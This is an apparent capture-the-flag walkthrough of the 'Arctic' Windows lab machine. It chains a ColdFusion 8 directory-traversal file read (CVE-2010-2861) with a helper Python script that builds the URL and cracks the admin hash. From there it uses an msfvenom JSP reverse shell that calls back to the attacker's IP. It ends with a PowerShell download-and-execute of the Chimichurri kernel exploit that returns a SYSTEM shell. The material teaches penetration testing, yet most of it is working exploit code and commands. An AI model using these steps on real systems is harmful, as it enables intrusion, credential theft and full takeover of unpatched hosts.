## Environment
- Name: Arctic
- System: Windows

## Information gathering
### Port scan
```
$ nmap -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at
Nmap scan report for 10.10.10.11
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
```
- Ports 135, 8500 and 49154 are open. 135 and 49154 are MSRPC endpoints, so the target is a Windows host. Nmap cannot identify the service on 8500 (`fmtp?`); 8500 is the default port of the ColdFusion built-in web server, which the `/CFIDE/` paths used below confirm.
### Port 135
```
$ nmap -p 135 --script vuln 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 14:02 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 13.46 seconds
```
- Nothing came of this: the host does not answer Nmap's ping probes, so the script scan gave up before it ever touched the port. Rerunning with `-Pn` skips host discovery; either way, the foothold comes from port 8500 below.
### Port 8500: web vulnerability enumeration
#### Exploit search
```
$ searchsploit ColdFusion
```
- searchsploit lists several ColdFusion entries; the one that applies to this ColdFusion 8 install is the directory-traversal arbitrary file read, CVE-2010-2861.
#### Reproduction
```
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```
- The `locale` parameter of `enter.cfm` is folded into a file path. Ten `../` steps climb to the drive root, `ColdFusion8/lib/password.properties` is the file that holds the administrator credentials, and the `%00` null byte cuts the path off before whatever the application appends after the parameter. The response reflects the file, including a `password=` entry: the administrator password stored as an unsalted SHA-1 hash.
#### Decoding
Because the hash is unsalted SHA-1, a lookup table reverses it whenever the password is a common word. One online service:
https://hashtoolkit.com/reverse-sha1-hash
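As an added example (not code from the original post or from Adobe), the following Python script reproduces the reproduction and decoding steps offline: it builds the CVE-2010-2861 traversal URL in the same shape as the one above, pulls the `password=` entry out of a response body, and checks the SHA-1 hash against a wordlist the way the lookup site does. The host, port, wordlist and the sample response (built around `sha1("password")`) are constructed for the example; the optional `fetch()` helper is the only part that touches the network.

```python
"""CVE-2010-2861 (ColdFusion 8 directory traversal) helper.

Added example for this write-up, not code from the original post or from
Adobe. Host, port, wordlist and the sample response below are constructed.
"""
import hashlib
import re
import urllib.request
from typing import Dict, Iterable, Optional

ENTER_CFM = "/CFIDE/administrator/enter.cfm"


def build_traversal_url(host: str, port: int = 8500,
                        target: str = "ColdFusion8/lib/password.properties",
                        depth: int = 10) -> str:
    """enter.cfm folds the `locale` parameter into a file path. `depth`
    "../" steps climb to the drive root (ten is enough for a default
    install). "%00en" is the tail used by the public PoC for this CVE:
    the null byte cuts the path off before the suffix the application
    appends after our value."""
    traversal = "../" * depth + target
    return f"http://{host}:{port}{ENTER_CFM}?locale={traversal}%00en"


def parse_password_properties(body: str) -> Dict[str, Optional[str]]:
    """The leaked file is reflected inside the login page HTML, so search
    the whole body. ColdFusion 8 stores the administrator password as an
    unsalted SHA-1 (40 hex digits) under `password=`; `encrypted=true`
    marks that value as a hash rather than plaintext. The \\b keeps the
    separate `rdspassword=` entry from matching."""
    m = re.search(r"\bpassword=([0-9A-Fa-f]{40})\b", body)
    if m is None:
        raise ValueError("no 40-hex-digit password= entry in response")
    enc = re.search(r"\bencrypted=(true|false)\b", body)
    return {
        "sha1": m.group(1).upper(),
        "encrypted": enc.group(1) if enc else None,
    }


def crack_sha1(hexdigest: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline equivalent of the lookup-table site: there is no salt, so
    one SHA-1 per candidate is all it takes."""
    target = hexdigest.upper()
    for word in candidates:
        if hashlib.sha1(word.encode()).hexdigest().upper() == target:
            return word
    return None


def fetch(url: str, timeout: float = 10.0) -> str:
    """Request the traversal URL (network; not used by the offline demo)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def recover_admin_password(body: str, wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Parse the leaked file out of a response and try to reverse the hash."""
    info = parse_password_properties(body)
    info["password"] = crack_sha1(info["sha1"], wordlist)
    return info


# Constructed sample response: a login page with the properties file
# reflected in it. The hash is sha1("password") so the demo runs offline;
# the rdspassword value is a placeholder, not a real ColdFusion value.
SAMPLE_RESPONSE = "\n".join([
    "<html><body>",
    "#constructed sample",
    "rdspassword=Qv9x/constructed+placeholder==",
    "password=" + hashlib.sha1(b"password").hexdigest().upper(),
    "encrypted=true",
    '<form name="loginform">...</form>',
    "</body></html>",
])

# Constructed wordlist; on a real target feed in a full list.
WORDLIST = ["123456", "admin", "coldfusion", "letmein", "password"]


if __name__ == "__main__":
    print(build_traversal_url("10.10.10.11"))
    print(recover_admin_password(SAMPLE_RESPONSE, WORDLIST))
```

If the wordlist misses, the hash is still worth keeping: it is the exact value the admin login form submits after hashing, so it can be reused without ever learning the plaintext.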
## Getting a shell
### Information gathering
#### Generate the shell
```
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.16 LPORT=12345 -f raw > icekamrec.jsp
```
#### Start an HTTP server
```
$ python -m SimpleHTTPServer 80
```
#### Listen with nc
Start a netcat listener on port 12345, the LPORT baked into the JSP.
#### Submit
Log in to the ColdFusion administrator with the recovered password and use its scheduled-task feature, which fetches a URL and can save the response to a file: point it at the JSP on the attacker's HTTP server and save the output inside the web root so the file is reachable over port 8500:
```
C:\ColdFusion8\wwwroot\CFIDE\icekamrec.jsp
```
- After submitting on the web page it did not run automatically for me; I had to click Run manually and then curl the shell.
```
curl http://10.10.10.11:8500/CFIDE/icekamrec.jsp
```
#### Shell obtained
#### User flag
```
C:\Users\tolis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis\Desktop

22/03/2017  09:00    <DIR>          .
22/03/2017  09:00    <DIR>          ..
22/03/2017  09:01                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.180.786.688 bytes free

C:\Users\tolis\Desktop>type user.txt
type user.txt
02650d3a69a70780c302e146a6cb96f3
```
## Privilege escalation
### System vulnerability enumeration
```
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45
System Boot Time:          29/10/2019, 7:44:31
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 217 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.173 MB
Virtual Memory: In Use:    874 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11
```
- Save the systeminfo output to a file and run it through Windows-Exploit-Suggester.
```
$ ./windows-exploit-suggester.py --database 2019-10-28-mssb.xls --systeminfo /tmp/systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
```
- `Hotfix(s): N/A` together with build 7600 means this is Server 2008 R2 RTM with no service pack and no updates at all, so every bulletin in the database matches. The Internet Explorer cumulative updates are client-side bugs and useless from a command shell; the candidates that matter are the local elevation-of-privilege bulletins, and MS10-059 has a ready-made public exploit, Chimichurri.
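An added example (not from the original post or from Windows-Exploit-Suggester) of the triage a practitioner does on this output: parse `systeminfo` for build, architecture and installed hotfixes, then keep only the suggester findings that are usable from a local shell, i.e. elevation-of-privilege bulletins backed by an exploit-db PoC or a Metasploit module. The two sample inputs are constructed from the values shown above.

```python
"""Privilege-escalation triage helper.

Added example for this write-up, not code from the original post or from
Windows-Exploit-Suggester. The sample inputs are constructed from the
systeminfo and suggester output shown above.
"""
import re
from typing import Dict, List

# Constructed sample: a subset of the systeminfo output shown above.
SAMPLE_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Configuration:          Standalone Server
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed sample: the bulletin lines Windows-Exploit-Suggester printed above.
SAMPLE_WES = """\
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[*] done
"""

# "[E] MS10-059: <title> (<KB>) - <severity>"
WES_LINE = re.compile(
    r"^\[([EM])\]\s+(MS\d{2}-\d{3}):\s+(.*?)\s+\((\d+)\)\s+-\s+(\w+)\s*$")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract the fields that drive exploit selection. systeminfo prints
    'Key: value' per line; Hotfix(s) is 'N/A' when nothing is installed and
    otherwise a count followed by one indented '[NN]: KBxxxxxx' line each."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z() /]+?):\s+(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    hotfixes = re.findall(r"^\s*\[\d+\]:\s*(KB\d+)", text, re.M)
    build = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    return {
        "os": fields.get("OS Name", ""),
        "build": int(build.group(1)) if build else None,
        "arch": fields.get("System Type", ""),
        "hotfixes": hotfixes,
        # Build 7600 is 2008 R2 RTM (SP1 is 7601); with no hotfixes at all,
        # every bulletin for this OS is still open.
        "fully_unpatched": not hotfixes,
    }


def triage_wes(text: str) -> List[Dict[str, str]]:
    """Keep only findings usable from a non-admin local shell: bulletins whose
    title is an elevation of privilege. Cumulative IE updates and other
    remote/client-side bugs are dropped; [*] reference lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = WES_LINE.match(line.strip())
        if not m:
            continue
        kind, bulletin, title, kb, severity = m.groups()
        if "Elevation of Privilege" not in title:
            continue
        findings.append({
            "bulletin": bulletin,
            "kb": kb,
            "severity": severity,
            "source": "metasploit" if kind == "M" else "exploitdb",
            "title": title,
        })
    return findings


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os']} build {info['build']} ({info['arch']}), "
          f"{len(info['hotfixes'])} hotfixes")
    for f in triage_wes(SAMPLE_WES):
        print(f"{f['bulletin']} [{f['source']}] {f['title']}")
```

On the output above this keeps five kernel/service EoP bulletins and drops the rest; MS10-059 is the one with a standalone binary exploit, which is why the next step fetches Chimichurri.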
### Download the PoC
```
$ proxychains git clone https://github.com/Re4son/Chimichurri.git
```
### Serve it over HTTP
```
$ cd Chimichurri
$ python -m SimpleHTTPServer 80
```
### Start a second nc listener
Listen on port 4433, the port passed to the exploit below.
### Fetch the PoC on the target
```
C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1

C:\ColdFusion8>echo $url = "http://10.10.14.16/Chimichurri.exe" >>wget.ps1
echo $url = "http://10.10.14.16/Chimichurri.exe" >>wget.ps1

C:\ColdFusion8>echo $file = "icekam.exe" >>wget.ps1
echo $file = "icekam.exe" >>wget.ps1

C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

C:\ColdFusion8>icekam.exe 10.10.14.16 4433
```
- The download here uses a PowerShell script written line by line with `echo`; a one-line download command or a Metasploit upload would work just as well. Chimichurri takes the attacker's IP and port and sends a SYSTEM shell back to them.
### Root flag
```
$ nc -nlvp 4433
listening on [any] 4433 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.11] 51706
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8>whoami
whoami
nt authority\system

cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>root.txt
root.txt

c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90

c:\Users\Administrator\Desktop>
```
## Takeaways
A classic Windows privilege escalation through two chained reverse shells: an application-level file read to get into the admin panel, a JSP shell from there, and a kernel exploit on an unpatched host to reach SYSTEM. A good approach to learn from.